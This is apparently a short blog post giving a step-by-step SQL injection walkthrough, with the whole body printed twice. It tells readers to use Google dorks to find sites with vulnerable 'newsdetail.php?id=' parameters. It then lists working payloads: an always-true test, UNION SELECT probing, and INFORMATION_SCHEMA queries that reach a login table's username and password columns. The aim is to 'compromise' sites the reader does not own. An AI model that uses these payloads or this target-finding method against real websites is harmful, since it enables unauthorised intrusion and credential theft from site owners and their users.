Search Google about Dork List 2013 SQL Injection
Here are some from the list is :
http://tutsql.blogspot.com/2013/06/dork-list.html
http://securitypedia.blogspot.com/p/dork-list-2013_7588.html
-- choose one way of them to google it like : inurl:newsdetail.php?id=
-- choose one of the sites in the below and then do the following checks
http://www.somesite.com/newsdetail.php?id=-1' or '1'='1
-- success else , if fail and this error appears , that means this site is injectable , you can use another way to compromise it .
Warning : Don't forget to get the database version .
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,2,3,4,5
-- try and test --> 5 arguments success
-- the 2,4 appears on the picture means that the DB reply to your injection . (It works)
Now , You can do the rest ..
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,table_name,table_name%20from%20INFORMATION_SCHEMA.tables%20%20limit%2043,1
-- success -- table name : login
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20492,1
-- login.username
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20493,1
-- login.password
Here are some from the list is :
http://tutsql.blogspot.com/2013/06/dork-list.html
http://securitypedia.blogspot.com/p/dork-list-2013_7588.html
-- choose one way of them to google it like : inurl:newsdetail.php?id=
-- choose one of the sites in the below and then do the following checks
http://www.somesite.com/newsdetail.php?id=-1' or '1'='1
-- success else , if fail and this error appears , that means this site is injectable , you can use another way to compromise it .
Warning : Don't forget to get the database version .
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,2,3,4,5
-- try and test --> 5 arguments success
-- the 2,4 appears on the picture means that the DB reply to your injection . (It works)
Now , You can do the rest ..
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,table_name,table_name%20from%20INFORMATION_SCHEMA.tables%20%20limit%2043,1
-- success -- table name : login
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20492,1
-- login.username
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20493,1
-- login.password
Comments
Post a Comment